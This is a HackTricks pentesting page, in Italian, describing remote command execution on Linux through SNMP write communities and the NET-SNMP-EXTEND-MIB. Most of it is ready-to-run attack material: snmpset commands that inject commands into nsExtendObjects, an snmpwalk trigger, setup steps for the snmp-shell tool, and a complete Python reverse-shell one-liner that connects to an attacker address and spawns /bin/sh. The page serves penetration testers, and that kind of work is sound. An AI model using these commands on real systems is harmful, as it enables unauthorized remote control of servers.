hacktricks/network-services-pentesting/pentesting-snmp/snmp-rce.md
2024-02-10 13:03:23 +00:00

5.1 KiB

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

SNMP RCE

SNMP può essere sfruttato da un attaccante se l'amministratore trascura la sua configurazione predefinita sul dispositivo o server. Sfruttando la comunità SNMP con permessi di scrittura (rwcommunity) su un sistema operativo Linux, l'attaccante può eseguire comandi sul server.

Estendere i servizi con comandi aggiuntivi

Per estendere i servizi SNMP e aggiungere comandi extra, è possibile aggiungere nuove righe alla tabella "nsExtendObjects". Ciò può essere ottenuto utilizzando il comando snmpset e fornendo i parametri necessari, inclusi il percorso assoluto dell'eseguibile e il comando da eseguire:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Iniezione di Comandi per l'Esecuzione

L'iniezione di comandi da eseguire sul servizio SNMP richiede l'esistenza e l'eseguibilità del binario/script chiamato. Il NET-SNMP-EXTEND-MIB richiede di fornire il percorso assoluto dell'eseguibile.

Per confermare l'esecuzione del comando iniettato, è possibile utilizzare il comando snmpwalk per enumerare il servizio SNMP. L'output mostrerà il comando e i relativi dettagli, inclusi il percorso assoluto:

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

Esecuzione dei comandi iniettati

Quando il comando iniettato viene letto, viene eseguito. Questo comportamento è noto come run-on-read(). L'esecuzione del comando può essere osservata durante la lettura di snmpwalk.

Ottenere una shell del server con SNMP

Per ottenere il controllo del server e ottenere una shell del server, può essere utilizzato uno script Python sviluppato da mxrch disponibile su https://github.com/mxrch/snmp-shell.git.

In alternativa, è possibile creare manualmente una reverse shell iniettando un comando specifico in SNMP. Questo comando, attivato da snmpwalk, stabilisce una connessione reverse shell alla macchina dell'attaccante, consentendo il controllo sulla macchina vittima. È possibile installare il prerequisito per eseguire questo:

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Oppure una shell inversa:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Riferimenti

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks: